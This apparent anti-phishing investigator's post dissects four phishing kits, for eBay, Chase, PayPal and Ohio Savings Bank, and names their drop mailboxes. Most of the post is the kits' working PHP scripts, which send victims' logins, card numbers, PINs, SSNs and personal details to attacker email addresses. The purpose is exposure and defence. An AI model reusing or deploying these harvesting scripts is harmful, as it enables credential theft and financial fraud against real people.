Pic 1 |
Pic 2 |
Pic 3 |
Pic 4 |
Pic 5 |
Pic 6 |
Pic 7 |
I first ran across this multi tasking criminal from an ebay phish spam. While digging around the Ebay Phish (Pic 1), I also located a Chase Bank phish on the same server in Venezuela (Pic 2). I then found the Phishers uploads which showed that he had 3 Phish Payloads there (Pic 3). In addition to the Ebay (aw-cgi), and the Chase Bank (chaseonline) phishes, there was a third payload (account) which turned out to be Ohio Savings Bank. The OSB does not appear to have an active directory (yet), however, it would look like this partial template from his file (Pic 4).
After working on extracting the drop box information, I then went back the next day to see if the Ohio Bank had been activated yet. It had not, however, he had now added a fourth phish, and activated it (pp/)(Pic 7),it was a Paypal phish (Pic 5). That "this page has been removed" line is a typical phish tactic. It is a ruse to get you to click on the "Click here to go to our main page" link that will then trigger a javascript that adjusts you browser, and overlays a url location of the real PayPal site, to further confirm that you are at the "real site" see (Pic 6).
Info from this four pack phish:
1) The data drop on the Ohio Savings Bank goes to:
ebaysp4m@yahoo.com showing a From: "Ohio Savings cc@ohiqsavings.com"
2) The data drop for the Ebay phish is in two parts, first the User ID/Password is sent to
ebaysp4m@yahoo.com with a From: "Nene Bun" (---> Romanian), and a Subject: "$userid $pass". The card data is also sent to
ebaysp4m@yahoo.com, after the card number passes a validation script.
3) The Chase Bank phish data and the victims IP address are sent to
antibmw@gmail.com with a From: "Chase Login" and a Subject: "$user - $pass". The victim's name, card data, bank account #, SSN, DOB, and ATM pin, are emailed to the same
antibmw@gmail.com by complete.php with a From: "Chase Card", and Subject: "$ccnumber".
4) The data from the Paypal phish is emailed to
teinvitsapleci@gmail.com with a From: "PP", and a Subject: "PP - ". Included in this data are: Name, complete address, SSN, Mothers maiden name, DOB, Card #, Pin#, cvv2, and IP address, all going to
teinvitsapleci@gmail.comOhio Savings Bank Phish:verify.php
<?
session_start();
$user = $_SESSION['user'];
$pass = $_SESSION['pass'];
$name = $_POST['name'];
$address = $_POST['address'];
$city = $_POST['city'];
$state = $_POST['state'];
$zip = $_POST['zip'];
$card = $_POST['ccnumber'];
$month = $_POST['month'];
$year = $_POST['year'];
$atm = $_POST['atmpin'];
$email = $_POST['email'];
$ip = getenv("REMOTE_ADDR");
if((!is_numeric($card)) || (strlen($card) != 16) || (!is_numeric($atm)) || (strlen($atm) != 4))
{
header("Location: verify.htm?error=1");
}
else
{
$message="##################################################\n
";
$message=$message."User: $user\n
";
$message=$message."Pass: $pass\n
";
$message=$message."Name: $name\n
";
$message=$message."Address: $address\n
";
$message=$message."City: $city\n
";
$message=$message."State: $state\n
";
$message=$message."Zip: $zip\n
";
$message=$message."Card Number: $card\n
";
$message=$message."Exp: $month/$year\n
";
$message=$message."PIN: $atm\n
";
$message=$message."E-mail: $email\n
";
$message=$message."IP: $ip\n
";
$message=$message."##################################################
";
mail ("ebaysp4m@yahoo.com","$card $month/$year $atm $ip","$message","From: Ohio Savings <cc@ohiqsavings.com>\n");
header("Location: http://www.ohiosavings.com");
}
?>
Many victims do not realize that even if they just enter the user ID and password on the first page of a phish, then see the second page that asks for all the financial data, and realize "something is not right" and back out. The user ID and Password have already been captured and are on their way to the criminal. As you can see below the user id/password is processed by login.php as soon as it is entered. If the victim completes the second page with the cc info, then update.php processes that info separately. The phisher gets two emails:
login.php
<?
session_start();
$userid = $_POST['userid'];
$pass = $_POST['pass'];
$ip = getenv("REMOTE_ADDR");
$adddate=date("D M d, Y g:i a");
//sending email info here
$subj = "$userid $pass";
$msg = "Username: $userid\nPassword: $pass\nIP: $ip\nDate: $adddate";
$from = "Nene Bun";
if ($userid==""||$pass=="") require ("eBayISAPI_.html");
else{
mail("ebaysp4m@yahoo.com", $subj, $msg, $from);
header("Location:processcard.html");
}
?>
Ebay Phish
Notice how the scumbag records the victims IP address in the Update message as "Punk'd IP".
Update.php
<?php
include("ccval.php");
$ip = getenv("REMOTE_ADDR");
$newCreditCardIssuer=$_POST["newCreditCardIssuer"];
$creditcard=$_POST["creditcard"];
$ccmonth=$_POST["ccmonth"];
$ccyear=$_POST["ccyear"];
$cvv=$_POST["cvv"];
$pin=$_POST["pin"];
$message="--------------------------------------------------\n";
$message=$message."Punk'd IP: $ip\n";
$message=$message."Credit Card Type: $newCreditCardIssuer\n";
$message=$message."Credit Card Number: $creditcard\n";
$message=$message."Expiration Date: $ccmonth / $ccyear\n";
$message=$message."CVV: $cvv\n";
$message=$message."PIN: $pin\n";
$Result = ccval($creditcard, $newCreditCardIssuer);
if (strlen($cvv)<3||$Result!=1||$pin==""||$ccmonth=="00"||$ccyear=="0000") require("includeerror.html");
else {
mail("ebaysp4m@yahoo.com", "$creditcard $pin $cvv", $message);
require("processcard2.html");
}
?>
Notice the card validation script listed above, ccval.php, that runs the card before writing the data. For those of you that like to load up phish with bogus data, you need to use numbers that pass the Luhn Formula, or the fake data will never get to cram the phishers box. It is a commonly used script by phishers, you can tell if they are active by the rejection warning. (I have included the code from the phish at the end). Some sites that load up phishes with fake data do not address this issue, and the fake data is just discarded.
Chase Bank Phish:The Chase phish operates the same as the Ebay Phish with the User ID/Password processed as soon as they are entered by login.php. The cc data is processed by
login.php
<?php
$user = $_POST['user'];
$pass = $_POST['pass'];
$ip = getenv("REMOTE_ADDR");
$adddate=date("D M d, Y g:i a");
$msg = "IP: $ip\n$adddate\n\n Username: $user\nPassword: $pass";
$to="antibmw@gmail.com";
$subj = "$user - $pass";
$from = "Chase Login";
$arr=array($to, $message);
foreach ($arr as $to)
{
mail ($to, $subj, $msg, $from);
}
header("Location: update.htm");
?>
Chase Bank
complete.php
<?php
$ccname = $_POST['name'];
$ccnumber = $_POST['cc'];
$cvv2 = $_POST['cvv2'];
$account = $_POST['account'];
$ssn = $_POST['ssn'];
$ccmonth = $_POST['ccmonth'];
$ccyear = $_POST['ccyear'];
$dday = $_POST['dday'];
$dmonth = $_POST['dmonth'];
$dyear = $_POST['dyear'];
$pin = $_POST['pin'];
$ip = getenv("REMOTE_ADDR");
$adddate=date("D M d, Y g:i a");
$msg = "IP: $ip\n$adddate\n\n CC name: $ccname\nCC Number: $ccnumber\nCVV2: $cvv2\nAccount Number: $account\nSSN: $ssn\nDOB: $dday-$dmonth-$dyear\nCC Month: $ccmonth\nCC year : $ccyear\nPIN: $pin";
$to="antibmw@gmail.com";
$subj = "$ccnumber";
$from = "Chase Card";
$arr=array($to, $message);
foreach ($arr as $to)
{
mail ($to, $subj, $msg, $from);
}
header("Location: http://www.chase.com/cm/cs?pagename=Chase/Href&urlname=chase/cc/terms");
?>
update.php
<?php
session_start();
function _GetParam($Nume, $Default = "") {
if ( isset($_GET[$Nume]) )
return $_GET[$Nume];
else if ( isset($_POST[$Nume]) )
return $_POST[$Nume];
else
return $Default;
}
$ip = getenv("REMOTE_ADDR");
$adddate = date("D M d, Y g:i a");
//sending email info here
$ccnum = _GetParam("ccnum");
$ccmonth = _GetParam("ccmonth");
$ccyear = _GetParam("ccyear");
$pin = _GetParam("pin");
$cvv2 = _GetParam("cvv2");
$fname = _GetParam("fname");
$address = _GetParam("address");
$city = _GetParam("city");
$state = _GetParam("state");
$zip = _GetParam("zip");
$country = _GetParam("country");
$ssn1 = _GetParam("ssn1");
$ssn2 = _GetParam("ssn2");
$ssn3 = _GetParam("ssn3");
$mmn = _GetParam("mmn");
$dob = _GetParam("dob");
$dates = date("d/m/Y - H:i:s");
$browser = $_SERVER['HTTP_USER_AGENT'];
$from = "From: PP ";
$subject = "PP - ".$ccnum." | ".$ccmonth."-".$ccyear." | ".$pin." | ".$ip."";
$mesaj = '
PP Card Number: '.$ccnum.'
PP Expiration Date: '.$ccmonth.'-'.$ccyear.'
PP PIN: '.$pin.'
PP CVV2: '.$cvv2.'
PP Name: '.$fname.'
PP Address: '.$address.'
PP City: '.$city.'
PP State: '.$state.'
PP Zip: '.$zip.'
PP Country: '.$country.'
PP SSN: '.$ssn1.'-'.$ssn2.'-'.$ssn3.'
PP Mother: '.$mmn.'
PP DOB: '.$dob.'
IP: '.$ip.'
Browser used: '.$browser.'
Date and time: "'.$dates.' Central Time (US & Canada)
';
mail("teinvitsapleci@gmail.com", $subject, $mesaj);
?>
I have smudged the phish location as it is still active, and the phish upload packages are relatively easy to find. Not the pre made phishes are hard to come by, however, I do not want to expand the current library of any phishers by pointing them there. If anyone who is verifiable and needs them for analysis, IM me.
Card validation script:
ccval.php
<?php
/************************************************************************
*
* CCVal - Credit Card Validation function.
*
* Copyright (c) 1999, 2003 Holotech Enterprises. All rights reserved.
* You may freely modify and use this function for your own purposes. You
* may freely distribute it, without modification and with this notice
* and entire header intact.
*
* This function accepts a credit card number and, optionally, a code for
* a credit card name. If a Name code is specified, the number is checked
* against card-specific criteria, then validated with the Luhn Mod 10
* formula. Otherwise it is only checked against the formula. Valid name
* codes are:
*
* mcd - Master Card
* vis - Visa
* amx - American Express
* dsc - Discover
* dnc - Diners Club
* jcb - JCB
* swi - Switch
* dlt - Delta
* enr - EnRoute
*
* You can also optionally specify an expiration date in the formay mmyy.
* If the validation fails on the date, the function returns 0. If it
* fails on the number validation, it returns false.
*
* A description of the criteria used in this function can be found at
* http://www.paylib.net/ccval.html. If you have any questions or
* comments, please direct them to ccval@holotech.net
*
* Alan Little
* Holotech Enterprises
* http://www.holotech.net/
* August 2003
*
************************************************************************/
function CCVal($Num, $Name = "n/a", $Exp = "") {
// Check the expiration date first
if (strlen($Exp)) {
$Month = substr($Exp, 0, 2);
$Year = substr($Exp, -2);
$WorkDate = "$Month/01/$Year";
$WorkDate = strtotime($WorkDate);
$LastDay = date("t", $WorkDate);
$Expires = strtotime("$Month/$LastDay/$Year 11:59:59");
if ($Expires < time()) return 0;
}
// Innocent until proven guilty
$GoodCard = true;
// Get rid of any non-digits
$Num = ereg_replace("[^0-9]", "", $Num);
// Perform card-specific checks, if applicable
switch ($Name) {
case "mcd" :
$GoodCard = ereg("^5[1-5].{14}$", $Num);
break;
case "vis" :
$GoodCard = ereg("^4.{15}$|^4.{12}$", $Num);
break;
case "amx" :
$GoodCard = ereg("^3[47].{13}$", $Num);
break;
case "dsc" :
$GoodCard = ereg("^6011.{12}$", $Num);
break;
case "dnc" :
$GoodCard = ereg("^30[0-5].{11}$|^3[68].{12}$", $Num);
break;
case "jcb" :
$GoodCard = ereg("^3.{15}$|^2131|1800.{11}$", $Num);
break;
case "dlt" :
$GoodCard = ereg("^4.{15}$", $Num);
break;
case "swi" :
$GoodCard = ereg("^[456].{15}$|^[456].{17,18}$", $Num);
break;
case "enr" :
$GoodCard = ereg("^2014.{11}$|^2149.{11}$", $Num);
break;
}
// The Luhn formula works right to left, so reverse the number.
$Num = strrev($Num);
$Total = 0;
for ($x=0; $x<strlen($Num); $x++) {
$digit = substr($Num,$x,1);
// If it's an odd digit, double it
if ($x/2 != floor($x/2)) {
$digit *= 2;
// If the result is two digits, add them
if (strlen($digit) == 2)
$digit = substr($digit,0,1) + substr($digit,1,1);
}
// Add the current digit, doubled and added if applicable, to the Total
$Total += $digit;
}
// If it passed (or bypassed) the card-specific check and the Total is
// evenly divisible by 10, it's cool!
if ($GoodCard && $Total % 10 == 0) return true; else return false;
}
?>
MGD
Edit=Typos
